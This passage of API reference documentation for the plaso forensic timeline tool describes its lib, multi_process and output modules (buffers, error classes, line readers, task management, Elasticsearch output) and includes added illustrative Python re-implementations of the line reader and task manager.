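        if not data_type or data_type in seen:
            raise ValueError('Missing or duplicate data_type: {0!s}'.format(data_type))
        if formatter_type == 'basic':
            formatters.append(BasicFormatter(definition))
        elif formatter_type == 'conditional':
            formatters.append(ConditionalFormatter(definition))
        else:
            raise ValueError('Unsupported formatter type: {0!s}'.format(formatter_type))
        seen.add(data_type)
    return formatters


# Constructed definitions: the fs:stat one mirrors the YAML fragment above,
# the example:event one is made up for this example.
DEFINITIONS = [
    {'type': 'conditional', 'data_type': 'fs:stat',
     'message': ['{display_name}', 'Type: {file_entry_type}', '({unallocated})'],
     'short_message': ['(unknown)']},
    {'type': 'basic', 'data_type': 'example:event',
     'message': 'Attributes: {attribute_driven}',
     'short_message': '{attribute_driven}'},
]

if __name__ == '__main__':
    fs_stat, _ = load_formatters(DEFINITIONS)
    print(fs_stat.get_message(
        {'display_name': 'OS:/var/log/syslog', 'file_entry_type': 'file'}))
```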

Module contents

This file contains an import statement for each formatter.

5.1.8 plaso.lib package

Submodules

plaso.lib.bufferlib module

Circular buffer for storing event objects.

class plaso.lib.bufferlib.CircularBuffer(size)
    Bases: object

    Class that defines a circular buffer for storing event objects.

    Append(item)
        Add an item to the list.

        Parameters item (object) – item.

    Clear()
        Removes all elements from the list.

    Flush()
        Returns a generator for all items and clears the buffer.

    GetCurrent()
        Retrieves the current item that index points to.

        Returns item.

        Return type object

    __iter__()
        Return all elements from the list.

    __len__()
        Return the length (the fixed size).

    property size
        number of elements in the buffer.

        Type int

plaso.lib.decorators module

Function decorators.

plaso.lib.decorators.deprecated(function)
    Decorator to mark functions or methods as deprecated.

plaso.lib.definitions module

The definitions.

plaso.lib.dtfabric_helper module

The dtFabric helper mix-in.

class plaso.lib.dtfabric_helper.DtFabricHelper
    Bases: object

    dtFabric format definition helper mix-in.

    dtFabric defines its data format structures in a dtFabric definition file, for example "dtfabric.yaml":

        name: int32
        type: integer
        description: 32-bit signed integer type
        attributes:
          format: signed
          size: 4
          units: bytes
        ---
        name: point3d
        aliases: [POINT]
        type: structure
        description: Point in 3 dimensional space.
        attributes:
          byte_order: little-endian
        members:
        - name: x
          aliases: [XCOORD]
          data_type: int32
        - name: y
          data_type: int32
        - name: z
          data_type: int32

    The path to the definition file is defined in the class constant "_DEFINITION_FILE" and will be read on class instantiation.

    The definition file contains data type definitions such as "int32" and "point3d" in the previous example.

    A data type map can be used to create a Python object that represents the data type definition mapped to a byte stream, for example if we have the following byte stream:

        01 00 00 00 02 00 00 00 03 00 00 00

    The corresponding "point3d" Python object would be:

        point3d(x=1, y=2, z=3)

plaso.lib.errors module

This file contains the error classes.

exception plaso.lib.errors.BadConfigObject
    Bases: plaso.lib.errors.Error
    Raised when the configuration object is of the wrong type.

exception plaso.lib.errors.BadConfigOption
    Bases: plaso.lib.errors.Error
    Raised when a faulty configuration option is encountered.

exception plaso.lib.errors.ConnectionError
    Bases: plaso.lib.errors.Error
    Error connecting to a service.

exception plaso.lib.errors.Error
    Bases: Exception
    Base error class.

exception plaso.lib.errors.InvalidEvent
    Bases: plaso.lib.errors.Error
    Error indicating an event is malformed.

exception plaso.lib.errors.InvalidFilter
    Bases: plaso.lib.errors.Error
    Error indicating an invalid filter was specified.

exception plaso.lib.errors.InvalidNumberOfOperands
    Bases: plaso.lib.errors.Error
    The number of operands provided to an objectfilter operator is wrong.

exception plaso.lib.errors.MalformedPresetError
    Bases: plaso.lib.errors.Error
    Raised when a parser preset definition is malformed.

exception plaso.lib.errors.MaximumRecursionDepth
    Bases: plaso.lib.errors.Error
    Raised when the maximum recursion depth is reached.

exception plaso.lib.errors.NoFormatterFound
    Bases: plaso.lib.errors.Error
    Raised when no formatter is found for a particular event object.

exception plaso.lib.errors.ParseError
    Bases: plaso.lib.errors.Error
    Raised when a parse error occurred.

exception plaso.lib.errors.PreProcessFail
    Bases: plaso.lib.errors.Error
    Raised when a preprocess module is unable to gather information.

exception plaso.lib.errors.QueueAlreadyClosed
    Bases: plaso.lib.errors.Error
    Raised when an attempt is made to close a queue that is already closed.

exception plaso.lib.errors.QueueAlreadyStarted
    Bases: plaso.lib.errors.Error
    Raised when an attempt is made to start a queue that is already started.

exception plaso.lib.errors.QueueClose
    Bases: plaso.lib.errors.Error
    Class that implements a queue close exception.

exception plaso.lib.errors.QueueEmpty
    Bases: plaso.lib.errors.Error
    Class that implements a queue empty exception.

exception plaso.lib.errors.QueueFull
    Bases: plaso.lib.errors.Error
    Class that implements a queue full exception.

exception plaso.lib.errors.SerializationError
    Bases: plaso.lib.errors.Error
    Class that defines serialization errors.

exception plaso.lib.errors.SourceScannerError
    Bases: plaso.lib.errors.Error
    Class that defines source scanner errors.

exception plaso.lib.errors.TaggingFileError
    Bases: plaso.lib.errors.Error
    Raised when the tagging file is invalid.

exception plaso.lib.errors.TimestampError
    Bases: plaso.lib.errors.Error
    Class that defines timestamp errors.

exception plaso.lib.errors.UnableToLoadRegistryHelper
    Bases: plaso.lib.errors.Error
    Raised when unable to load a Registry helper object.

exception plaso.lib.errors.UnableToParseFile
    Bases: plaso.lib.errors.Error
    Raised when a parser is not designed to parse a file.

exception plaso.lib.errors.UserAbort
    Bases: plaso.lib.errors.Error
    Class that defines a user initiated abort exception.

exception plaso.lib.errors.WrongBencodePlugin
    Bases: plaso.lib.errors.Error
    Error reporting wrong bencode plugin used.

exception plaso.lib.errors.WrongFormatter
    Bases: plaso.lib.errors.Error
    Raised when the formatter is not applicable for a particular event.

exception plaso.lib.errors.WrongPlugin
    Bases: plaso.lib.errors.Error
    Raised when the plugin is of the wrong type.

exception plaso.lib.errors.WrongQueueType
    Bases: plaso.lib.errors.Error
    Raised when an unsupported operation is attempted on a queue. For example, attempting to Pop from a Push-only queue.

plaso.lib.line_reader_file module

Binary line reader file-like object.

class plaso.lib.line_reader_file.BinaryDSVReader(binary_line_reader, delimiter)
    Bases: object
    Basic reader for delimiter separated text files of unknown encoding. This is used for reading data from text files where the content is unknown, or possibly using a mixed encoding.

    __iter__()
        Iterates over delimiter separated values.
        Yields: list(bytes) – lines of encoded bytes.

class plaso.lib.line_reader_file.BinaryLineReader(file_object, end_of_line=b'\n')
    Bases: object
    Line reader for binary file-like objects.

    end_of_line
        byte sequence that separates lines from each other.
        Type: bytes

    MAXIMUM_READ_BUFFER_SIZE = 16777216

    __enter__()
        Enters a with statement.

    __exit__(exception_type, value, traceback)
        Exits a with statement.

    __iter__()
        Returns a line of text.
        Yields: bytes – line of text.

    readline(size=None)
        Reads a single line of text.
        The function reads one entire line from the file-like object. A trailing end-of-line indicator (newline by default) is kept in the byte string (but may be absent when a file ends with an incomplete line). An empty byte string is returned only when end-of-file is encountered immediately.
        Parameters: size (Optional[int]) – maximum byte size to read. If present and non-negative, it is a maximum byte count (including the trailing end-of-line) and an incomplete line may be returned.
        Returns: line of text.
        Return type: bytes
        Raises: ValueError – if the specified size is less than zero or greater than the maximum size allowed.

    readlines(sizehint=None)
        Reads lines of text.
        The function reads until EOF using readline() and returns a list containing the lines read.
        Parameters: sizehint (Optional[int]) – maximum byte size to read. If present, instead of reading up to EOF, whole lines totalling sizehint bytes are read.
        Returns: lines of text.
        Return type: list[bytes]

    tell()
        Retrieves the current offset into the file-like object.
        Returns: current offset into the file-like object.
        Return type: int
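As an added example (this is not plaso's own module), the following standalone Python re-implements the behaviour documented above for BinaryLineReader and BinaryDSVReader: lines are kept as raw bytes so that mixed or unknown encodings never raise decode errors, the size argument can return an incomplete line, tell() reports the offset of the next unread line, and an empty byte string signals end-of-file. The 4096-byte chunk size, the stripping of the end-of-line before splitting fields and the sample rows are this example's own assumptions.

```python
import io

# Standalone re-implementation of the documented BinaryLineReader and
# BinaryDSVReader behaviour. Example code, not plaso's module: the chunk size
# and the end-of-line stripping in BinaryDSVReader are this example's choices.


class BinaryLineReader(object):
  """Line reader for binary file-like objects (keeps bytes, never decodes)."""

  MAXIMUM_READ_BUFFER_SIZE = 16 * 1024 * 1024
  _CHUNK_SIZE = 4096  # assumption: bytes pulled from the file per read

  def __init__(self, file_object, end_of_line=b'\n'):
    self._file_object = file_object
    self.end_of_line = end_of_line
    self._buffer = b''

  def __enter__(self):
    return self

  def __exit__(self, exception_type, value, traceback):
    return False

  def __iter__(self):
    line = self.readline()
    while line:
      yield line
      line = self.readline()

  def readline(self, size=None):
    """Reads one line; the end-of-line stays attached; b'' only at EOF."""
    if size is not None and (size < 0 or size > self.MAXIMUM_READ_BUFFER_SIZE):
      raise ValueError('Invalid size: {0!s}'.format(size))
    while True:
      index = self._buffer.find(self.end_of_line)
      if index >= 0:
        end = index + len(self.end_of_line)
        if size is not None:
          end = min(end, size)  # the limit may cut the line short
        line, self._buffer = self._buffer[:end], self._buffer[end:]
        return line
      if size is not None and len(self._buffer) >= size:
        line, self._buffer = self._buffer[:size], self._buffer[size:]
        return line
      chunk = self._file_object.read(self._CHUNK_SIZE)
      if not chunk:
        line, self._buffer = self._buffer, b''  # last line without end-of-line
        return line
      self._buffer += chunk

  def readlines(self, sizehint=None):
    """Reads whole lines until EOF, or until sizehint bytes have been read."""
    lines, total = [], 0
    while sizehint is None or total < sizehint:
      line = self.readline()
      if not line:
        break
      lines.append(line)
      total += len(line)
    return lines

  def tell(self):
    """Offset of the next unread line, not the underlying read position."""
    return self._file_object.tell() - len(self._buffer)


class BinaryDSVReader(object):
  """Splits each raw line on a byte delimiter without decoding it."""

  def __init__(self, binary_line_reader, delimiter):
    self._line_reader = binary_line_reader
    self._delimiter = delimiter

  def __iter__(self):
    for line in self._line_reader:
      yield line.rstrip(b'\r\n').split(self._delimiter)


# Constructed sample: a UTF-8 row, a Latin-1 row (which a strict UTF-8 decode
# would reject) and a final row without a trailing newline.
SAMPLE = (b'user,caf\xc3\xa9,2021-06-06\n'
          b'user,caf\xe9,2021-06-07\n'
          b'partial,line')


def read_records(data, delimiter=b','):
  """Returns the delimiter separated fields of every line as bytes."""
  with BinaryLineReader(io.BytesIO(data)) as reader:
    return list(BinaryDSVReader(reader, delimiter))


def demo_size_limit(data=b'abcdefg\nhi'):
  """Shows size truncation, tell() tracking and the b'' EOF signal."""
  reader = BinaryLineReader(io.BytesIO(data))
  first = reader.readline(size=4)  # incomplete line
  offset = reader.tell()
  rest = [reader.readline(), reader.readline(), reader.readline()]
  try:
    reader.readline(size=-1)
    size_error = False
  except ValueError:
    size_error = True
  return first, offset, rest, size_error


def demo_readlines(data=b'ab\ncd\nef\n', sizehint=5):
  """Whole lines are read until sizehint bytes have been consumed."""
  return BinaryLineReader(io.BytesIO(data)).readlines(sizehint=sizehint)
```

Keeping the fields as bytes and deferring the decode to the parser is what lets a reader survive files that mix encodings, which is common in carved or multi-source log data.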

plaso.lib.loggers module

Logging related classes and functions.

class plaso.lib.loggers.CompressedFileHandler(filename, mode='a', encoding='utf-8')
    Bases: logging.FileHandler
    Compressed file handler for logging.

plaso.lib.loggers.ConfigureLogging(debug_output=False, filename=None, mode='w', quiet_mode=False)
    Configures the logging root logger.
    Parameters:
        • debug_output (Optional[bool]) – True if the logging should include debug output.
        • filename (Optional[str]) – log filename.
        • mode (Optional[str]) – log file access mode.
        • quiet_mode (Optional[bool]) – True if the logging should not include information output. Note that debug_output takes precedence over quiet_mode.

plaso.lib.plist module

The plist file object.

class plaso.lib.plist.PlistFile
    Bases: object
    Class that defines a plist file.

    root_key
        the plist root key.
        Type: dict

    GetValueByPath(path_segments)
        Retrieves a plist value by path.
        Parameters: path_segments (list[str]) – path segment strings relative to the root of the plist.
        Returns: the value of the key specified by the path or None.
        Return type: object

    Read(file_object)
        Reads a plist from a file-like object.
        Parameters: file_object (dfvfs.FileIO) – a file-like object containing plist data.
        Raises:
            • IOError – if the plist file-like object cannot be read.
            • OSError – if the plist file-like object cannot be read.

plaso.lib.specification module

The format specification classes.

class plaso.lib.specification.FormatSpecification(identifier, text_format=False)
    Bases: object
    The format specification.

    AddNewSignature(pattern, offset=None)
        Adds a signature.
        Parameters:
            • pattern (bytes) – pattern of the signature.
            • offset (int) – offset of the signature. None is used to indicate the signature has no offset. A positive offset is relative from the start of the data; a negative offset is relative from the end of the data.

    IsTextFormat()
        Determines if the format is a text format.
        Returns: True if the format is a text format, False otherwise.
        Return type: bool


class plaso.lib.specification.FormatSpecificationStore
    Bases: object
    The store for format specifications.

    AddNewSpecification(identifier)
        Adds a new format specification.
        Parameters: identifier (str) – format identifier, which should be unique for the store.
        Returns: format specification.
        Return type: FormatSpecification
        Raises: KeyError – if the store already contains a specification with the same identifier.

    AddSpecification(specification)
        Adds a format specification.
        Parameters: specification (FormatSpecification) – format specification.
        Raises: KeyError – if the store already contains a specification with the same identifier.

    GetSpecificationBySignature(signature_identifier)
        Retrieves a specification mapped to a signature identifier.
        Parameters: signature_identifier (str) – unique signature identifier for a specification store.
        Returns: format specification or None if the signature identifier does not exist within the specification store.
        Return type: FormatSpecification

    property specifications
        specifications iterator.
        Type: iterator

class plaso.lib.specification.Signature(pattern, offset=None)
    Bases: object
    The format specification signature.
    The signature consists of a byte string pattern, an optional offset relative to the start of the data, and a value to indicate if the pattern is bound to the offset.

    SetIdentifier(identifier)
        Sets the identifier of the signature in the specification store.
        Parameters: identifier (str) – unique signature identifier for a specification store.


Module contents

5.1.9 plaso.multi_process package

Submodules

plaso.multi_process.analysis_engine module

The task-based multi-process processing analysis engine.

class plaso.multi_process.analysis_engine.AnalysisMultiProcessEngine(worker_memory_limit=None, worker_timeout=None)
    Bases: plaso.multi_process.task_engine.TaskMultiProcessEngine
    Task-based multi-process analysis engine.
    This class contains functionality to:
        • monitor and manage analysis tasks;
        • merge results returned by analysis worker processes.

    AnalyzeEvents(session, knowledge_base_object, storage_writer, data_location, analysis_plugins, processing_configuration, event_filter=None, event_filter_expression=None, status_update_callback=None, storage_file_path=None)
        Analyzes events in a Plaso storage.
        Parameters:
            • session (Session) – session in which the events are analyzed.
            • knowledge_base_object (KnowledgeBase) – contains information from the source data needed for processing.
            • storage_writer (StorageWriter) – storage writer.
            • data_location (str) – path to the location that data files should be loaded from.
            • analysis_plugins (dict[str, AnalysisPlugin]) – analysis plugins that should be run and their names.
            • processing_configuration (ProcessingConfiguration) – processing configuration.
            • event_filter (Optional[EventObjectFilter]) – event filter.
            • event_filter_expression (Optional[str]) – event filter expression.
            • status_update_callback (Optional[function]) – callback function for status updates.
            • storage_file_path (Optional[str]) – path to the session storage file.
        Raises: KeyboardInterrupt – if a keyboard interrupt was raised.

plaso.multi_process.analysis_process module

The multi-process analysis process.

class plaso.multi_process.analysis_process.AnalysisProcess(event_queue, knowledge_base, session, analysis_plugin, processing_configuration, data_location=None, event_filter_expression=None, **kwargs)
    Bases: plaso.multi_process.task_process.MultiProcessTaskProcess
    Multi-processing analysis process.

    SignalAbort()
        Signals the process to abort.

plaso.multi_process.base_process module

Base class for a process used in multi-processing.

class plaso.multi_process.base_process.MultiProcessBaseProcess(processing_configuration, enable_sigsegv_handler=False, **kwargs)
    Bases: multiprocessing.context.Process
    Interface for multi-processing process.

    rpc_port
        port number of the process status RPC server.
        Type: int

    abstract SignalAbort()
        Signals the process to abort.

    property name
        process name.
        Type: str

    run()
        Runs the process.

plaso.multi_process.engine module

The multi-process processing engine.

class plaso.multi_process.engine.MultiProcessEngine
    Bases: plaso.engine.engine.BaseEngine
    Multi-process engine base.
    This class contains functionality to:
        • monitor and manage worker processes;
        • retrieve process status information via RPC;
        • manage the status update thread.

plaso.multi_process.extraction_engine module

The task-based multi-process processing extraction engine.

class plaso.multi_process.extraction_engine.ExtractionMultiProcessEngine(maximum_number_of_tasks=None, number_of_worker_processes=0, worker_memory_limit=None, worker_timeout=None)
    Bases: plaso.multi_process.task_engine.TaskMultiProcessEngine
    Task-based multi-process extraction engine.
    This class contains functionality to:
        • monitor and manage extraction tasks;
        • merge results returned by extraction worker processes.

    ProcessSources(session, source_path_specs, storage_writer, processing_configuration, enable_sigsegv_handler=False, status_update_callback=None, storage_file_path=None)
        Processes the sources and extracts events.
        Parameters:
            • session (Session) – session in which the sources are processed.
            • source_path_specs (list[dfvfs.PathSpec]) – path specifications of the sources to process.
            • storage_writer (StorageWriter) – storage writer for a session storage.
            • processing_configuration (ProcessingConfiguration) – processing configuration.
            • enable_sigsegv_handler (Optional[bool]) – True if the SIGSEGV handler should be enabled.
            • status_update_callback (Optional[function]) – callback function for status updates.
            • storage_file_path (Optional[str]) – path to the session storage file.
        Returns: processing status.
        Return type: ProcessingStatus

plaso.multi_process.extraction_process module

The multi-process extraction worker process.

class plaso.multi_process.extraction_process.ExtractionWorkerProcess(task_queue, collection_filters_helper, knowledge_base, session, processing_configuration, **kwargs)
    Bases: plaso.multi_process.task_process.MultiProcessTaskPro­cess
    Multi-processing extraction worker process.

    SignalAbort()
        Signals the process to abort.


plaso.multi_process.logger module

The multi-processing sub module logger.

plaso.multi_process.output_engine module

The output and formatting multi-processing engine.

class plaso.multi_process.output_engine.OutputAndFormattingMultiProcessEngine
    Bases: plaso.multi_process.engine.MultiProcessEngine
    Output and formatting multi-processing engine.

    ExportEvents(knowledge_base_object, storage_reader, output_module, processing_configuration, deduplicate_events=True, event_filter=None, status_update_callback=None, time_slice=None, use_time_slicer=False)
        Exports events using an output module.
        Parameters:
            • knowledge_base_object (KnowledgeBase) – contains information from the source data needed for processing.
            • storage_reader (StorageReader) – storage reader.
            • output_module (OutputModule) – output module.
            • processing_configuration (ProcessingConfiguration) – processing configuration.
            • deduplicate_events (Optional[bool]) – True if events should be deduplicated.
            • event_filter (Optional[EventObjectFilter]) – event filter.
            • status_update_callback (Optional[function]) – callback function for status updates.
            • time_slice (Optional[TimeSlice]) – slice of time to output.
            • use_time_slicer (Optional[bool]) – True if the ‘time slicer’ should be used. The ‘time slicer’ will provide a context of events around an event of interest.

class plaso.multi_process.output_engine.PsortEventHeap
    Bases: object
    Psort event heap.

    PopEvent()
        Pops an event from the heap.
        Returns: tuple containing: str: identifier of the event MACB group or None if the event cannot be grouped; str: identifier of the event content; EventObject: event; EventData: event data; EventDataStream: event data stream.
        Return type: tuple

    PopEvents()
        Pops events from the heap.


        Yields: tuple – containing: str: identifier of the event MACB group or None if the event cannot be grouped; str: identifier of the event content; EventObject: event; EventData: event data; EventDataStream: event data stream.

    PushEvent(event, event_data, event_data_stream)
        Pushes an event onto the heap.
        Parameters:
            • event (EventObject) – event.
            • event_data (EventData) – event data.
            • event_data_stream (EventDataStream) – event data stream.

    property number_of_events
        number of events on the heap.
        Type: int

plaso.multi_process.plaso_xmlrpc module

XML RPC server and client.

class plaso.multi_process.plaso_xmlrpc.ThreadedXMLRPCServer(callback)
    Bases: plaso.multi_process.rpc.RPCServer
    Threaded XML RPC server.

    Start(hostname, port)
        Starts the process status RPC server.
        Parameters:
            • hostname (str) – hostname or IP address to connect to for requests.
            • port (int) – port to connect to for requests.
        Returns: True if the RPC server was successfully started.
        Return type: bool

    Stop()
        Stops the process status RPC server.

class plaso.multi_process.plaso_xmlrpc.XMLProcessStatusRPCClient
    Bases: plaso.multi_process.plaso_xmlrpc.XMLRPCClient
    XML process status RPC client.

class plaso.multi_process.plaso_xmlrpc.XMLProcessStatusRPCServer(callback)
    Bases: plaso.multi_process.plaso_xmlrpc.ThreadedXMLRPCServer
    XML process status threaded RPC server.

class plaso.multi_process.plaso_xmlrpc.XMLRPCClient
    Bases: plaso.multi_process.rpc.RPCClient
    XML RPC client.


    CallFunction()
        Calls the function via RPC.

    Close()
        Closes the RPC communication channel to the server.

    Open(hostname, port)
        Opens an RPC communication channel to the server.
        Parameters:
            • hostname (str) – hostname or IP address to connect to for requests.
            • port (int) – port to connect to for requests.
        Returns: True if the communication channel was established.
        Return type: bool

plaso.multi_process.rpc module

The RPC client and server interface.

class plaso.multi_process.rpc.RPCClient
    Bases: object
    RPC client interface.

    abstract CallFunction()
        Calls the function via RPC.

    abstract Close()
        Closes the RPC communication channel to the server.

    abstract Open(hostname, port)
        Opens an RPC communication channel to the server.
        Parameters:
            • hostname (str) – hostname or IP address to connect to for requests.
            • port (int) – port to connect to for requests.
        Returns: True if the communication channel was established.
        Return type: bool

class plaso.multi_process.rpc.RPCServer(callback)
    Bases: object
    RPC server interface.

    abstract Start(hostname, port)
        Starts the RPC server.
        Parameters:
            • hostname (str) – hostname or IP address to connect to for requests.
            • port (int) – port to connect to for requests.
        Returns: True if the RPC server was successfully started.
        Return type: bool


    abstract Stop()
        Stops the RPC server.

plaso.multi_process.task_engine module

The task-based multi-process processing engine.

class plaso.multi_process.task_engine.TaskMultiProcessEngine
    Bases: plaso.multi_process.engine.MultiProcessEngine
    Task-based multi-process engine base.
    This class contains functionality to:
        • manage task storage used to store task results.

plaso.multi_process.task_manager module

The task manager.

class plaso.multi_process.task_manager.TaskManager
    Bases: object
    Manages tasks and tracks their completion and status.
    A task being tracked by the manager must be in exactly one of the following states:
        • abandoned: a task assumed to be abandoned because a task that has been queued or was processing exceeds the maximum inactive time.
        • merging: a task that is being merged by the engine.
        • pending_merge: the task has been processed and is ready to be merged with the session storage.
        • processed: a worker has completed processing the task, but it is not ready to be merged into the session storage.
        • processing: a worker is processing the task.
        • queued: the task is waiting for a worker to start processing it. It is also possible that a worker has already completed the task, but no status update was collected from the worker while it processed the task.
    Once the engine reports that a task is completely merged, it is removed from the task manager.
    Tasks are considered “pending” when there is more work that needs to be done to complete these tasks. Pending applies to tasks that are:
        • not abandoned;
        • abandoned, but need to be retried.
    Abandoned tasks without corresponding retry tasks are considered “failed” when the foreman is done processing.

    CheckTaskToMerge(task)
        Checks if the task should be merged.
        Parameters: task (Task) – task.
        Returns: True if the task should be merged.
        Return type: bool
        Raises: KeyError – if the task was not queued, processing or abandoned.

    CompleteTask(task)
        Completes a task.
        The task is complete and can be removed from the task manager.


        Parameters: task (Task) – task.
        Raises: KeyError – if the task was not merging.

    CreateRetryTask()
        Creates a task to retry a previously abandoned task.
        Returns: a task that was abandoned but should be retried, or None if there are no abandoned tasks that should be retried.
        Return type: Task

    CreateTask(session_identifier, storage_format='sqlite')
        Creates a task.
        Parameters:
            • session_identifier (str) – the identifier of the session the task is part of.
            • storage_format (Optional[str]) – the storage format that the task should be stored in.
        Returns: task attribute container.
        Return type: Task

    GetFailedTasks()
        Retrieves all failed tasks.
        Failed tasks are tasks that were abandoned and have no retry task once the foreman is done processing.
        Returns: tasks.
        Return type: list[Task]

    GetProcessedTaskByIdentifier(task_identifier)
        Retrieves a task that has been processed.
        Parameters: task_identifier (str) – unique identifier of the task.
        Returns: a task that has been processed.
        Return type: Task
        Raises: KeyError – if the task was not processing, queued or abandoned.

    GetStatusInformation()
        Retrieves status information about the tasks.
        Returns: tasks status information.
        Return type: TasksStatus

    GetTaskPendingMerge(current_task)
        Retrieves the first task that is pending merge or has a higher priority.
        This function will check if there is a task with a higher merge priority than the current_task being merged. If so, that task with the higher priority is returned.
        Parameters: current_task (Task) – current task being merged or None if no such task.
        Returns: the next task to merge or None if there is no task pending merge or with a higher priority.


        Return type: Task

    HasPendingTasks()
        Determines if there are tasks running or in need of retrying.
        Returns: True if there are tasks that are active, ready to be merged or need to be retried.
        Return type: bool

    RemoveTask(task)
        Removes an abandoned task.
        Parameters: task (Task) – task.
        Raises: KeyError – if the task was not abandoned or the task was abandoned and was not retried.

    SampleTaskStatus(task, status)
        Takes a sample of the status of the task for profiling.
        Parameters:
            • task (Task) – a task.
            • status (str) – status.

    StartProfiling(configuration, identifier)
        Starts profiling.
        Parameters:
            • configuration (ProfilingConfiguration) – profiling configuration.
            • identifier (str) – identifier of the profiling session used to create the sample filename.

    StopProfiling()
        Stops profiling.

    UpdateTaskAsPendingMerge(task)
        Updates the task manager to reflect that the task is ready to be merged.
        Parameters: task (Task) – task.
        Raises: KeyError – if the task was not queued, processing or abandoned, or the task was abandoned and has a retry task.

    UpdateTaskAsProcessingByIdentifier(task_identifier)
        Updates the task manager to reflect the task is processing.
        Parameters: task_identifier (str) – unique identifier of the task.
        Raises: KeyError – if the task is not known to the task manager.

plaso.multi_process.task_process module
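As an added example (not plaso's implementation), the following standalone Python is a simplified model of the TaskManager states and transitions documented above: a task is queued, a worker marks it processing and reports it processed, the engine moves it to pending_merge and merging and finally completes it; a queued or processing task idle beyond the inactivity limit is marked abandoned and can be retried. The single state dictionary, the injectable clock, the 300-second MAXIMUM_INACTIVE_TIME, the choice to queue a task on creation, the dict returned by GetStatusInformation and the omission of merge priorities, RemoveTask, HasPendingTasks and profiling are this example's own assumptions.

```python
import collections
import time
import uuid

# Simplified model of the TaskManager states documented above. Example code,
# not plaso's implementation: the single state dictionary, the injectable
# clock and the MAXIMUM_INACTIVE_TIME value are this example's own choices.

_WORKER_STATES = ('queued', 'processing', 'abandoned')  # a worker may still report


class Task(object):

  def __init__(self, session_identifier):
    self.identifier = uuid.uuid4().hex  # stand-in for plaso's Task container
    self.session_identifier = session_identifier
    self.last_processing_time = None


class TaskManager(object):
  MAXIMUM_INACTIVE_TIME = 300.0  # seconds; constructed value

  def __init__(self, clock=time.time):
    self._clock = clock
    self._tasks = {}          # identifier -> Task
    self._states = {}         # identifier -> documented state name
    self._processed = set()   # worker finished, result not yet ready to merge
    self._retried = set()     # abandoned tasks that already have a retry task

  def CreateTask(self, session_identifier):
    task = Task(session_identifier)
    task.last_processing_time = self._clock()
    self._tasks[task.identifier] = task
    self._states[task.identifier] = 'queued'  # assumption: queued on creation
    return task

  def UpdateTaskAsProcessingByIdentifier(self, task_identifier):
    if task_identifier not in self._tasks:
      raise KeyError(task_identifier)
    self._tasks[task_identifier].last_processing_time = self._clock()
    if self._states[task_identifier] in ('queued', 'abandoned'):
      self._states[task_identifier] = 'processing'

  def GetProcessedTaskByIdentifier(self, task_identifier):
    if self._states.get(task_identifier) not in _WORKER_STATES:
      raise KeyError(task_identifier)
    self._processed.add(task_identifier)
    return self._tasks[task_identifier]

  def CheckTaskToMerge(self, task):
    if self._states.get(task.identifier) not in _WORKER_STATES:
      raise KeyError(task.identifier)
    return task.identifier in self._processed

  def UpdateTaskAsPendingMerge(self, task):
    state = self._states.get(task.identifier)
    if state not in _WORKER_STATES or (
        state == 'abandoned' and task.identifier in self._retried):
      raise KeyError(task.identifier)
    self._processed.discard(task.identifier)
    self._states[task.identifier] = 'pending_merge'

  def GetTaskPendingMerge(self, current_task):
    if current_task is not None:  # priorities not modelled: one merge at a time
      return None
    for identifier, state in self._states.items():
      if state == 'pending_merge':
        self._states[identifier] = 'merging'
        return self._tasks[identifier]
    return None

  def CompleteTask(self, task):
    if self._states.get(task.identifier) != 'merging':
      raise KeyError(task.identifier)
    del self._states[task.identifier], self._tasks[task.identifier]

  def CreateRetryTask(self):
    for identifier, state in list(self._states.items()):
      if state == 'abandoned' and identifier not in self._retried:
        self._retried.add(identifier)
        return self.CreateTask(self._tasks[identifier].session_identifier)
    return None

  def GetStatusInformation(self):
    """Marks idle queued/processing tasks abandoned, then counts per state."""
    for identifier, state in list(self._states.items()):
      idle = self._clock() - self._tasks[identifier].last_processing_time
      if state in ('queued', 'processing') and idle > self.MAXIMUM_INACTIVE_TIME:
        self._states[identifier] = 'abandoned'
    return dict(collections.Counter(self._states.values()))


def RunScenario():
  clock = [1000.0]
  manager = TaskManager(clock=lambda: clock[0])
  task_a, task_b = manager.CreateTask('session-1'), manager.CreateTask('session-1')
  manager.UpdateTaskAsProcessingByIdentifier(task_a.identifier)
  manager.GetProcessedTaskByIdentifier(task_a.identifier)  # worker reported completion
  should_merge = manager.CheckTaskToMerge(task_a)
  manager.UpdateTaskAsPendingMerge(task_a)
  merging = manager.GetTaskPendingMerge(None)
  manager.CompleteTask(merging)
  clock[0] += TaskManager.MAXIMUM_INACTIVE_TIME + 1  # task_b never got a worker
  abandoned = manager.GetStatusInformation().get('abandoned', 0)
  retry_task = manager.CreateRetryTask()
  return (should_merge, merging is task_a, abandoned,
          retry_task.session_identifier, manager.GetStatusInformation())
```

The point of the abandon-and-retry path is robustness: a worker that is killed (for example by the memory limit) leaves its task behind, and the manager re-queues the work instead of silently losing events from that task's source.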

Base class for a process that handles tasks used in multi-processing.

class plaso.multi_process.task_process.MultiProcessTaskProcess(processing_configuration, enable_sigsegv_handler=False, **kwargs)
    Bases: plaso.multi_process.base_process.MultiProcessBaseProcess
    Interface for multi-processing process that handles tasks.


Module contents

5.1.10 plaso.output package

Submodules

plaso.output.dynamic module

Dynamic selected delimiter separated values output module.

class plaso.output.dynamic.DynamicFieldFormattingHelper(output_mediator)
    Bases: plaso.output.formatting_helper.FieldFormattingHelper
    Dynamic output module field formatting helper.

class plaso.output.dynamic.DynamicOutputModule(output_mediator)
    Bases: plaso.output.shared_dsv.DSVOutputModule
    Dynamic selected delimiter separated values output module.

    DESCRIPTION = 'Dynamic selection of fields for a separated value output format.'

    NAME = 'dynamic'

plaso.output.elastic module

An output module that saves events to Elasticsearch.

class plaso.output.elastic.ElasticsearchOutputModule(output_mediator)
    Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule
    Output module for Elasticsearch.

    DESCRIPTION = 'Saves the events into an Elasticsearch database.'

    MAPPINGS_FILENAME = 'elasticsearch.mappings'

    NAME = 'elastic'

    WriteHeader()
        Connects to the Elasticsearch server and creates the index.

plaso.output.elastic_ts module

An output module that saves events to Elasticsearch for Timesketch.

class plaso.output.elastic_ts.ElasticTimesketchOutputModule(output_mediator)
    Bases: plaso.output.shared_elastic.SharedElasticsearchOutputModule
    Output module for Timesketch Elasticsearch.

    DESCRIPTION = 'Saves the events into an Elasticsearch database for use with Timesketch.'

    GetMissingArguments()
        Retrieves a list of arguments that are missing from the input.
        Returns: names of arguments that are required by the module and have not been specified.
        Return type: list[str]

    MAPPINGS_FILENAME = 'plaso.mappings'

    MAPPINGS_PATH = '/etc/timesketch'

    NAME = 'elastic_ts'

    SetTimelineIdentifier(timeline_identifier)
